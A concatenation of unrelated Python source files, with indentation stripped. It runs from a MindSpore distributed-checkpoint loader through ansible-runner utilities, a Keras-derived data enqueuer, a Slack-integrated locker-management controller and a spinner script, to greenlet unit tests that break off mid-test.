f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
def load_distributed_checkpoint(network, checkpoint_filenames, predict_strategy=None):
"""
Load checkpoint into net for distributed predication.
Args:
network (Cell): Network for distributed predication.
checkpoint_filenames (list(str)): The name of Checkpoint files
in order of rank id.
predict_strategy (Optional(dict)): Strategy of predication process, whose key
is parameter name, and value is a list or a tuple that the first four
elements are [dev_matrix, tensor_map, param_split_shape, field]. If None,
it means that the predication process just uses single device.
Default: None.
Raises:
TypeError: The type of inputs do not match the requirements.
ValueError: Failed to load checkpoint into net.
"""
network = Validator.check_isinstance("network", network, nn.Cell)
for index, filename in enumerate(checkpoint_filenames):
if not isinstance(filename, str) or not os.path.exists(filename) \
or filename[-5:] != ".ckpt" or os.path.getsize(filename) == 0:
raise ValueError(f"Please make sure that the {filename} at index {index} is a valid checkpoint file.")
if not _check_predict_strategy(predict_strategy):
raise ValueError(f"Please make sure that the key of predict_strategy is str, "
f"and the value is a list or a tuple that the first four elements are "
f"dev_matrix (list[int]), tensor_map (list[int]), "
f"param_split_shape (list[int]) and field_size (zero).")
train_strategy_filename = context.get_auto_parallel_context("strategy_ckpt_load_file")
_train_strategy = build_searched_strategy(train_strategy_filename)
train_strategy = _convert_to_list(_train_strategy)
train_dev_count = 1
for dim in train_strategy[list(train_strategy.keys())[0]][0]:
train_dev_count *= dim
if train_dev_count != len(checkpoint_filenames):
raise ValueError(
f"The length of checkpoint_filenames should be equal to the device count of training process. "
f"The length is {len(checkpoint_filenames)} but the device count is {train_dev_count}.")
rank_list = _infer_rank_list(train_strategy, predict_strategy)
param_dict = {}
for _, param in network.parameters_and_names():
sliced_params = []
if param.name not in rank_list.keys():
continue
param_rank = rank_list[param.name][0]
skip_merge_split = rank_list[param.name][1]
for rank in param_rank:
sliced_param = _load_single_param(checkpoint_filenames[rank], param.name)
sliced_params.append(sliced_param)
if skip_merge_split:
split_param = sliced_params[0]
else:
param_unique_strategy = _remove_repeated_slices(train_strategy[param.name])
_param_unique_strategy = _convert_to_layout(param.name, param_unique_strategy)
split_param = _merge_and_split(sliced_params, _param_unique_strategy, predict_strategy)
param_dict[param.name] = split_param
load_param_into_net(network, param_dict)
def _check_predict_strategy(predict_strategy):
"""Check predict strategy."""
def _check_int_list(arg):
if not isinstance(arg, list):
return False
for item in arg:
if not isinstance(item, int):
return False
return True
if predict_strategy is None:
return True
predict_strategy = Validator.check_isinstance("predict_strategy", predict_strategy, dict)
for key in predict_strategy.keys():
if not isinstance(key, str) or not isinstance(predict_strategy[key], (list, tuple)) \
or len(predict_strategy[key]) < 4:
return False
dev_matrix, tensor_map, param_split_shape, field_size = predict_strategy[key][:4]
if not _check_int_list(dev_matrix) or not _check_int_list(tensor_map) or \
not (_check_int_list(param_split_shape) or not param_split_shape) or \
not (isinstance(field_size, int) and field_size == 0):
return False
return True
def _convert_to_list(strategy):
"""Convert ParallelLayouts object to specified list."""
train_map = {}
for param_name in strategy.keys():
try:
layout = strategy.get(param_name)
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
train_map[param_name] = [dev_mat, tensor_map, param_split_shape, field_size]
except BaseException as e:
raise ValueError(f"{e.__str__()}. Please make sure that strategy matches the node_strategy.proto.")
return train_map
def _convert_to_layout(param_name, tensor_layout):
"""Convert list to ParallelLayouts object."""
strategy = {}
try:
layout = ParallelLayouts()
layout.field = tensor_layout[3]
dev_matrix = layout.dev_matrix.add()
for item in tensor_layout[0]:
dev_matrix.dim.append(item)
tensor_map = layout.tensor_map.add()
for item in tensor_layout[1]:
tensor_map.dim.append(item)
param_split_shape = layout.param_split_shape.add()
for item in tensor_layout[2]:
param_split_shape.dim.append(item)
except BaseException as e:
raise ValueError("Convert failed. " + e.__str__())
strategy[param_name] = layout
return strategy
def _merge_and_split(sliced_params, train_strategy, predict_strategy):
"""Merge sliced parameter and split it according to the predict strategy."""
merged_param = merge_sliced_parameter(sliced_params, train_strategy)
if predict_strategy is None:
return merged_param
param_name = merged_param.name
tensor_layout = predict_strategy[param_name]
split_tensor = _load_tensor(merged_param.data, tensor_layout[0], tensor_layout[1])
requires_grad = merged_param.requires_grad
layerwise_parallel = merged_param.layerwise_parallel
split_param = Parameter(split_tensor, param_name, requires_grad, layerwise_parallel)
return split_param
def _load_single_param(ckpt_file_name, param_name):
"""Load a parameter from checkpoint."""
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s` during load single parameter,"
" please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter = None
try:
param_data_list = []
for element_id, element in enumerate(checkpoint_list.value):
if element.tag != param_name:
continue
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter = Parameter(Tensor(param_value, ms_type), name=element.tag)
break
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if parameter is None:
raise ValueError(f"There is no parameter named {param_name} in this checkpoint file {ckpt_file_name}, "
f"please check parameter name or checkpoint file.")
return parameter
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that proot is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError('bwrap unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(os.path.join(path,obj)):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
else:
kwargs['inventory'] = os.path.join(path,obj)
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
if not self.suppress_ansible_output:
sys.stdout.write(
data.encode('utf-8') if PY2 else data
)
self._handle.write(data)
self._handle.flush()
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
|
data_util.py
|
'''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = False
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
home_controller.py
|
from app.controllers.base_controller import BaseController
from app.repositories.request_repo import RequestRepo
from app.utils import request_status_text, request_item_title, floor_wings
from app.utils.slackhelper import SlackHelper
import pandas as pd
from app.repositories.user_repo import UserRepo
from app.models.locker import Locker
import threading
import humanize
class HomeController(BaseController):
def __init__(self, request):
BaseController.__init__(self, request)
self.request_repo = RequestRepo()
self.slackhelper = SlackHelper()
def home_page(self):
all_requests = self.request_repo.list_requests()
return self.handle_response('OK', payload={'requests': all_requests[0], 'meta': all_requests[1]})
def update_request_status(self, request_id):
msg, status = self.request_params('msg', 'status')
try:
status_text = request_status_text(status)
request_obj = self.request_repo.get(request_id)
if request_obj:
# This request has been marked ad completed already. No Updates allowed.
if request_obj.status == 2:
return self.handle_response(msg='This request has already been marked as completed. No Updates allowed', status_code=400)
# Update Request Object
self.request_repo.update(request_obj, **{'status': status})
slack_msg = f'''
```Request Update \n
RequestID: {request_obj.id} \n
Item Requested: {request_item_title(request_obj.item)} \n
Status: {status_text} \n
Staff Message: {msg}```
'''
self.slackhelper.post_message(msg=slack_msg, recipient=request_obj.user.slack_id)
return self.handle_response('OK', payload={'request': self.request_repo.serialize_request_response(request_obj)})
except Exception as e:
return self.handle_response(msg='Invalid Status ID Provided', status_code=400)
def import_data(self):
issues = []
page_number, = self.get_params('page')
csv = pd.read_csv(f'lockers-{page_number}.csv', )
for row in csv.itertuples():
email = row[1]
name = row[2]
locker_number = row[3]
status = row[4]
floor = row[5].lower()
wing = row[6].lower()
if floor == 'fifth':
floor_id = 5
if floor == 'fourth':
floor_id = 4
if floor == 'third':
floor_id = 3
if floor == 'first':
floor_id = 1
if wing == 'eko':
wing_id = 7
if wing == 'bay':
wing_id = 6
if wing == 'big apple':
wing_id = 5
if wing == 'safari':
wing_id = 4
if wing == 'kampala':
wing_id = 3
if wing == 'naija':
wing_id = 2
if wing == 'gold coast':
wing_id = 1
if type(email) is str:
first_name = name.split()[0]
last_name = name.split()[-1]
print(first_name, last_name)
slack_user = self.slackhelper.find_by_email(email)
if slack_user['ok'] is False:
missing_users = {'name': name, 'email': email, 'locker': locker_number, 'floor': floor, 'wing': wing}
issues.append(missing_users)
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, status=0)
locker.save()
else:
slack_id = slack_user['user']['id']
user = UserRepo().find_or_create(email=email, **{'first_name': first_name, 'last_name': last_name, 'slack_id': slack_id})
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, user_id=user.id, status=1)
locker.save()
msg = f'Hi {first_name}, \n' \
f'You currently are assigned locker number {locker_number} on the {humanize.ordinal(int(floor_id))} floor {floor_wings(int(wing_id))} wing. \n' \
f'If this information is wrong, please reach out to the facilities team for correction. If correct, kindly ignore this message and have a great day.\n' \
f'`Genie`'
t = threading.Thread(target=self.slackhelper.post_message, args=(msg, slack_id))
t.daemon = True
t.start()
if type(email) is float or status.lower == 'free':
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, status=0)
locker.save()
return self.handle_response('OK', payload={'missing users': issues, 'info': 'Invalid or Ex-Andela Staff. Their Lockers have been marked as available by default.'})
|
loadingAnimation.py
|
#!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
# @Author: KevinMidboe
# @Date: 2017-07-30 13:53:38
# @Last Modified by: KevinMidboe
# @Last Modified time: 2017-07-30 13:53:46
import itertools
from threading import Thread
from time import sleep
from sys import stdout
class LoadingAnimation(object):
def __init__(self):
self.done = False
def start(self):
t = Thread(target=self.animate)
t.start()
def animate(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if self.done:
break
stdout.write('\rFetching ' + c)
stdout.flush()
sleep(0.1)
def stop(self):
self.done = True
def main():
loadingAnimation = LoadingAnimation()
loadingAnimation.start()
sleep(2)
loadingAnimation.stop()
stdout.write('\rTemp \n')
if __name__ == '__main__':
main()
|
test_greenlet.py
|
import gc
import sys
import time
import threading
import unittest
from abc import ABCMeta, abstractmethod
from greenlet import greenlet
class SomeError(Exception):
pass
def fmain(seen):
try:
greenlet.getcurrent().parent.switch()
except:
seen.append(sys.exc_info()[0])
raise
raise SomeError
def send_exception(g, exc):
# note: send_exception(g, exc) can be now done with g.throw(exc).
# the purpose of this test is to explicitely check the propagation rules.
def crasher(exc):
raise exc
g1 = greenlet(crasher, parent=g)
g1.switch(exc)
class GreenletTests(unittest.TestCase):
def test_simple(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.append(3)
g = greenlet(f)
lst.append(0)
g.switch()
lst.append(2)
g.switch()
lst.append(4)
self.assertEqual(lst, list(range(5)))
def test_parent_equals_None(self):
g = greenlet(parent=None)
self.assertIsNotNone(g)
self.assertIs(g.parent, greenlet.getcurrent())
def test_run_equals_None(self):
g = greenlet(run=None)
self.assertIsNotNone(g)
self.assertIsNone(g.run)
def test_two_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.extend([1, 1])
g = greenlet(f)
h = greenlet(f)
g.switch()
self.assertEqual(len(lst), 1)
h.switch()
self.assertEqual(len(lst), 2)
h.switch()
self.assertEqual(len(lst), 4)
self.assertEqual(h.dead, True)
g.switch()
self.assertEqual(len(lst), 6)
self.assertEqual(g.dead, True)
def test_two_recursive_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
def g():
lst.append(1)
g = greenlet(f)
g.switch()
lst.append(1)
g = greenlet(g)
g.switch()
self.assertEqual(len(lst), 3)
self.assertEqual(sys.getrefcount(g), 2)
def test_threads(self):
success = []
def f():
self.test_simple()
success.append(True)
ths = [threading.Thread(target=f) for i in range(10)]
for th in ths:
th.start()
for th in ths:
th.join()
self.assertEqual(len(success), len(ths))
def test_exception(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
g2.parent = g1
self.assertEqual(seen, [])
self.assertRaises(SomeError, g2.switch)
self.assertEqual(seen, [SomeError])
g2.switch()
self.assertEqual(seen, [SomeError])
def test_send_exception(self):
seen = []
g1 = greenlet(fmain)
g1.switch(seen)
self.assertRaises(KeyError, send_exception, g1, KeyError)
self.assertEqual(seen, [KeyError])
def test_dealloc(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
self.assertEqual(seen, [])
del g1
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit])
del g2
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit])
def test_dealloc_other_thread(self):
seen = []
someref = []
lock = threading.Lock()
lock.acquire()
lock2 = threading.Lock()
lock2.acquire()
def f():
g1 = greenlet(fmain)
g1.switch(seen)
someref.append(g1)
del g1
gc.collect()
lock.release()
lock2.acquire()
greenlet() # trigger release
lock.release()
lock2.acquire()
t = threading.Thread(target=f)
t.start()
lock.acquire()
self.assertEqual(seen, [])
self.assertEqual(len(someref), 1)
del someref[:]
gc.collect()
# g1 is not released immediately because it's from another thread
self.assertEqual(seen, [])
lock2.release()
lock.acquire()
self.assertEqual(seen, [greenlet.GreenletExit])
lock2.release()
t.join()
def test_frame(self):
def f1():
f = sys._getframe(0) # pylint:disable=protected-access
self.assertEqual(f.f_back, None)
greenlet.getcurrent().parent.switch(f)
return "meaning of life"
g = greenlet(f1)
frame = g.switch()
self.assertTrue(frame is g.gr_frame)
self.assertTrue(g)
from_g = g.switch()
self.assertFalse(g)
self.assertEqual(from_g, 'meaning of life')
self.assertEqual(g.gr_frame, None)
def test_thread_bug(self):
def runner(x):
g = greenlet(lambda: time.sleep(x))
g.switch()
t1 = threading.Thread(target=runner, args=(0.2,))
t2 = threading.Thread(target=runner, args=(0.3,))
t1.start()
t2.start()
t1.join()
t2.join()
def test_switch_kwargs(self):
def run(a, b):
self.assertEqual(a, 4)
self.assertEqual(b, 2)
return 42
x = greenlet(run).switch(a=4, b=2)
self.assertEqual(x, 42)
def test_switch_kwargs_to_parent(self):
def run(x):
greenlet.getcurrent().parent.switch(x=x)
greenlet.getcurrent().parent.switch(2, x=3)
return x, x ** 2
g = greenlet(run)
self.assertEqual({'x': 3}, g.switch(3))
self.assertEqual(((2,), {'x': 3}), g.switch())
self.assertEqual((3, 9), g.switch())
def test_switch_to_another_thread(self):
data = {}
error = None
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
try:
data['g'].switch()
except greenlet.error:
error = sys.exc_info()[1]
self.assertIsNotNone(error, "greenlet.error was not raised!")
done_event.set()
thread.join()
def test_exc_state(self):
def f():
try:
raise ValueError('fun')
except: # pylint:disable=bare-except
exc_info = sys.exc_info()
greenlet(h).switch()
self.assertEqual(exc_info, sys.exc_info())
def h():
self.assertEqual(sys.exc_info(), (None, None, None))
greenlet(f).switch()
def test_instance_dict(self):
def f():
greenlet.getcurrent().test = 42
def deldict(g):
del g.__dict__
def setdict(g, value):
g.__dict__ = value
g = greenlet(f)
self.assertEqual(g.__dict__, {})
g.switch()
self.assertEqual(g.test, 42)
self.assertEqual(g.__dict__, {'test': 42})
g.__dict__ = g.__dict__
self.assertEqual(g.__dict__, {'test': 42})
self.assertRaises(TypeError, deldict, g)
self.assertRaises(TypeError, setdict, g, 42)
def test_threaded_reparent(self):
data = {}
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
def blank():
greenlet.getcurrent().parent.switch()
def setparent(g, value):
g.parent = value
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
g = greenlet(blank)
g.switch()
self.assertRaises(ValueError, setparent, g, data['g'])
done_event.set()
thread.join()
def test_deepcopy(self):
import copy
self.assertRaises(TypeError, copy.copy, greenlet())
self.assertRaises(TypeError, copy.deepcopy, greenlet())
def test_parent_restored_on_kill(self):
hub = greenlet(lambda: None)
main = greenlet.getcurrent()
result = []
def worker():
try:
# Wait to be killed
main.switch()
except greenlet.GreenletExit:
# Resurrect and switch to parent
result.append(greenlet.getcurrent().parent)
result.append(greenlet.getcurrent())
hub.switch()
g = greenlet(worker, parent=hub)
g.switch()
del g
self.assertTrue(result)
self.assertEqual(result[0], main)
self.assertEqual(result[1].parent, hub)
def test_parent_return_failure(self):
# No run causes AttributeError on switch
g1 = greenlet()
# Greenlet that implicitly switches to parent
g2 = greenlet(lambda: None, parent=g1)
# AttributeError should propagate to us, no fatal errors
self.assertRaises(AttributeError, g2.switch)
def test_throw_exception_not_lost(self):
class mygreenlet(greenlet):
def __getattribute__(self, name):
try:
raise Exception()
except: # pylint:disable=bare-except
pass
return greenlet.__getattribute__(self, name)
g = mygreenlet(lambda: None)
self.assertRaises(SomeError, g.throw, SomeError())
def test_throw_doesnt_crash(self):
result = []
def worker():
greenlet.getcurrent().parent.switch()
def creator():
g = greenlet(worker)
g.switch()
result.append(g)
t = threading.Thread(target=creator)
t.start()
t.join()
self.assertRaises(greenlet.error, result[0].throw, SomeError())
def test_recursive_startup(self):
class convoluted(greenlet):
def __init__(self):
greenlet.__init__(self)
self.count = 0
def __getattribute__(self, name):
if name == 'run' and self.count == 0:
self.count = 1
self.switch(43)
return greenlet.__getattribute__(self, name)
def run(self, value):
while True:
self.parent.switch(value)
g = convoluted()
self.assertEqual(g.switch(42), 43)
def test_unexpected_reparenting(self):
another = []
def worker():
g = greenlet(lambda: None)
another.append(g)
g.switch()
t = threading.Thread(target=worker)
t.start()
t.join()
class convoluted(greenlet):
def __getattribute__(self, name):
if name == 'run':
self.parent = another[0] # pylint:disable=attribute-defined-outside-init
return greenlet.__getattribute__(self, name)
g = convoluted(lambda: None)
self.assertRaises(greenlet.error, g.switch)
def test_threaded_updatecurrent(self):
# released when main thread should execute
lock1 = threading.Lock()
lock1.acquire()
# released when another thread should execute
lock2 = threading.Lock()
lock2.acquire()
class finalized(object):
def __del__(self):
# happens while in green_updatecurrent() in main greenlet
# should be very careful not to accidentally call it again
